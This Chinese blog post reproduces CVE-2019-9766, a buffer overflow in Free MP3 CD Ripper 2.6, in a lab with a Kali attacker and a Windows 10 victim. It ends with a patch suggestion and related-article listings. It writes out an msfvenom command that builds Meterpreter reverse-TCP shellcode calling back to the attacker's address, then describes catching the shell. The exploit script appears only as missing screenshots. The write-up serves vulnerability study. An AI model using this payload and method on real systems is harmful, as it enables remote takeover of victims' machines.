(CVE-2019-9766)Free MP3 CD Ripper缓冲区溢出远程代码执行漏洞复现

最新推荐文章于 2020-09-21 14:36:50 发布
最新推荐文章于 2020-09-21 14:36:50 发布
阅读量383 收藏
点赞数
分类专栏: CVE漏洞复现 文章标签: 安全漏洞 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liuyan76/article/details/107596710
版权

漏洞简介:

Free MP3 CD Ripper是一款音频格式转换器。
Free MP3 CD Ripper 2.6版本中存在栈缓冲区溢出漏洞。远程攻击者可借助特制的.mp3文件利用该漏洞执行任意代码。

威胁类型

远程代码执行

威胁等级

漏洞编号

CVE-2019-9766
受影响系统及应用版本
Free MP3 CD Ripper 2.6

漏洞复现:

攻击机:kali2020 、kali2019
ip:192.168.6.146
受害机:win10
ip:192.168.6.142
安装Free MP3 CD Ripper 2.6版本

1、搭建环境

Win10下载安装Free MP3 CD Ripper 2.6版本
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

利用msf生成反向连接的shellcode

msfvenom -p windows / meterpreter / reverse_tcp lhost = 192.168.6.146 lport = 888 -fc --smallest
在这里插入图片描述

替换脚本中的shellcode.

编写生成.Mp3文件的脚本

在这里插入图片描述

运行脚本,生成一个.MP3的文件

在这里插入图片描述
在这里插入图片描述

将生成的.mp3文件放到win10上(需要VMtools)

在这里插入图片描述

kali开启msfconsole

在这里插入图片描述

使用exploit/multi/handler模块
设置lhost,lport,攻击载荷
在这里插入图片描述

Kali开启监听:
在这里插入图片描述

Win10使用free MP3 CD ripper 打开mp3文件
在这里插入图片描述

弹回shell
在这里插入图片描述

执行命令

在这里插入图片描述

漏洞利用成功

PS:说一个我踩的坑吧,真的头一次遇到这种情况:

进攻利用攻击机需要用kali2019版本,2020版本不可以利用。用2020试了好多遍都没有成功,最后鬼使神差的用了2019就成功了。有遇到过这样的情况的大佬分享一下经验吗。

2、修复建议v

及时更新Free MP3 CD Ripper到最新版本

参考链接:https : //blog.csdn.net/weixin_46132680/article/details/104366335

whh6tl
关注
专栏目录
漏洞学习之CVE-2009-1330 Easy RM to MP3 Converter
ATree的博客
11-18 985
最近学习了有关漏洞方面的知识,了解虽不是很深刻,但是也还算是入了坑,稍微知道点,别人在谈论时,也可以接上话了。 目标软件是Easy Rm to MP3 Converter,根据CVE上的公示可知,它的漏洞是在对.m3u音频列表文件解析出了问题,通过了解可知,.m3u文件是文本文件,这就给我们比较大的发展空间了,非常方便的构造一个这样的文件然后去触发这个漏洞产生。我们在构造这个文件时需要注
cve-2019-9766引出的缓冲区漏洞学习
zwish的信安之路
06-25 1616
通过工程实践引出的缓冲区溢出缓冲区溢出 缓冲区攻击的最终目的就是希望系统能执行这块可读写内存中已经被蓄意设定好的恶意代码。 1、栈的结构 1、先进后出。 2、在内存中表现为从高地址往低地址增长。 3、栈顶:栈的最上方(低地址区)。 4、栈低:栈的最下方(高地址区)。 基本的进程地址空间分布: 2、基本栈溢出: 缓冲区溢出示意图: 如果在数据段(右边的data)就保存了一系列的指令的二进制代码...
刻录制作CD光盘(Free MP3 CD Ripper) v2.6 免费版.exe
07-09
MP3 CD Ripper是一个强大的和容易的CD制作程序,它建立在一个CD抓轨和音频转换器。您可以轻易地rip音频转换您最喜爱的音频CD音轨,MP3等流行的音频格式如WAV,WMA OGG,FLAC以及APE等你可以转换你的MP3到WAV,WAV等为WMA的MP3,WAV等光盘工具允许您从远程CDDB获取CD信息。 它也支持ID3标签和声音正常化。使用内置CD播放器,可以预览CD音轨开始之前,CD抓轨过程。用简单明了的界面,你可以开始通过点击几下,即使没有阅读任何帮助。如果你正在寻找一个应用程序来帮助您翻录音频CD和音频文件转换成不同的格式,你不会失望的。
Free MP3 CD Ripper_缓冲区溢出远程代码执行_CVE-2019-9766漏洞复现
WY92139010的博客
07-02 301
Free MP3 CD Ripper_缓冲区溢出远程代码执行_CVE-2019-9766漏洞复现 一、漏洞描述 Free MP3 CD Ripper是一款音频格式转换器。Free MP3 CD Ripper 2.6版本中存在缓冲区溢出漏洞远程攻击者可以借助特制的以.mp3为后缀的文件,利用该漏洞执行任意代码。 二、漏洞影响版本 Free MP3 CD Ripper 2.6 三...
CVE-2019-9766-----Free MP3 CD Ripper音频转换器漏洞复现
per_se_veran_ce的博客
08-19 900
漏洞简介 Free MP3 CD Ripper是一款音频格式转换器。Free MP3 CD Ripper 2.6版本中存在缓冲区溢出漏洞远程攻击者可以借助特制的以.mp3为后缀的文件,利用该漏洞执行任意代码。 vision 2.6缓冲区中存在基于堆栈的溢出。所以我们可以为它创建一个Poc。文件类型已更改为.mp3并从远程攻击它 实验环境 攻击机:kali 192.168.168.165 目...
cve-2019-0192一把梭
Yale的博客
03-26 5289
背景: 近日,Apache Solr官方团队在最新的安全更新中披露了一则Apache Solr Deserialization 远程代码执行漏洞CVE-2019-0192)。漏洞官方定级为 High,属于高危漏洞。该漏洞本质是ConfigAPI允许通过HTTP POST请求配置Solr的JMX服务器。攻击者可以通过ConfigAPI将其配置指向恶意RMI服务器,利用Solr的不安全反序列化来触发...
CVE-2017-12617漏洞分析
四盘山博客
10-18 3458
CVE-2017-12617Apache Tomcat团队10月3日宣布,如果配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有操作系统上的潜在危险的远程执行代码(RCE)漏洞CVE-2017-12617:远程代码执行漏洞。环境使用image: tomcat:7.0.79-jre8复现漏洞docker-compose
CVE-2018-9995漏洞复现
qq_39627497的博客
12-06 3060
DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机,相对于传统的模拟摄像录像机,采用硬盘录像,故常常被称为硬盘录像机,也被称为DVR。它是一套进行图像计算存储处理的计算机系统,具有对图像/语音和动态帧等进行长时间录像、录音、远程监视和控制的功能,DVR集合了录像机、画面分割器、云台镜头控制、报警控制、网络传输等五种功能于一身,用一台设备就能取代模拟监控系统一...
Tomcat RCE 漏洞复现CVE-2019-0232)
大哥一声吼
04-18 1万+
漏洞影响范围,直接看官方公告: 总结起来漏洞影响范围如下: tomcat 7.0.04之前 tomcat 8.5.40之前 tomcat 9.0.19之前 版本都会影响 (tomcat 服务器版本在受影响范围内的小伙伴可以打一波补丁了) 测试环境 tomcat 版本8.5.31 jdk版本8.121 漏洞利用前提 修改conf里面的内容 第一处:con...
OpenSSH 安全漏洞(CVE-2019-6111) 欺骗安全漏洞CVE-2019-6110)欺骗安全漏洞CVE-2019-6109)解决办法
热门推荐
weixin_43103905的博客
05-07 1万+
漏洞情况 如标题三个漏洞2019年1月26日发布,发现存在该问题的设备使用的是OpenSSH 7.9版本。 三个安全漏洞问题为scp相关问题,出现在openssh-client。 解决办法: 目前发现成功解决该问题的方式是在openssh官网中找到,官网于4月26日发布最新OpenSSH 8.0版本中提到: 原引:https://www.openssh.com/txt/release-8.0 T...
ES文件管理器未授权访问漏洞CVE-2019-6447)
公众号shadow sock7
01-20 3940
漏洞描述 在受害者ES文件管理器启动一次后,会开放TCP端口59777作为HTTP服务器。攻击者可在没有访问控制的wifi环境下通过构造json请求,读取受害者的文件,启动受害者任意app。受害者手机无需root,攻击者也无需授权凭据。 影响范围: ES文件管理器 4.1.9.7.4 and below 经测试在root和非root手机上4.1.9.4版本ES文件管理器(http://shouji...
CVE-2019-0232漏洞复现
whh6tl的博客
07-25 6960
漏洞简介 2019年4月10日,Apache Tomcat披露了一个漏洞漏洞编号为CVE-2019-0232,该漏洞存在于启用了enableCmdLineArguments选项的CGI Servlet中,与JRE向Windows传递参数过程中的bug有关。成功利用此漏洞可允许远程攻击者在目标服务器上执行任意命令,从而导致服务器被完全控制。由于Apache Tomcat应用范围广泛,该漏洞一旦被大规模利用,带来后果将不堪设想。 威胁类型 远程代码执行、提权; 威胁等级 高 漏洞编号 CVE-2019-023
CVE-2019-9766漏洞复现
玄道的网安博客
09-21 472
简介 Free MP3 CD Ripper是一款音频格式转换器。Free MP3 CD Ripper 2.6版本中存在缓冲区溢出漏洞远程攻击者可以借助特制的以.mp3为后缀的文件,利用该漏洞执行任意代码。 环境搭建 1.攻击机:kali ip:192.168.111.129 2.靶机:windows10 安装Free MP3 CD Ripper 2.6版本 ip:192.168.3.20 ...
(CVE-2020-1938)Apache Tomcat远程代码执行漏洞复现
whh6tl的博客
07-26 4688
漏洞简介 Apache Tomcat是Java Servlet,JavaServer Pages,Java Expression Language和WebSocket技术的开源实现。 Tomcat提供了可以在其中运行Java代码的“纯Java” HTTP Web服务器环境。 最近,Apache Tomcat修复了一个漏洞CVE-2020-1938),该漏洞使攻击者可以读取任何webapps文件(例如webapp配置文件,源代码等)或包括一个文件来远程执行代码。由于Tomcat默认开启的AJP服务(8009
CVE-2019-19781 Citrix漏洞远程代码执行详解与检测
"本文将深入探讨CVE-2019-19781漏洞,该漏洞影响了Citrix Application Delivery Controller(ADC)和Citrix Gateway,可能导致远程代码执行(RCE)。我们将分析漏洞的成因、检测方法以及利用示例,帮助读者了解其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值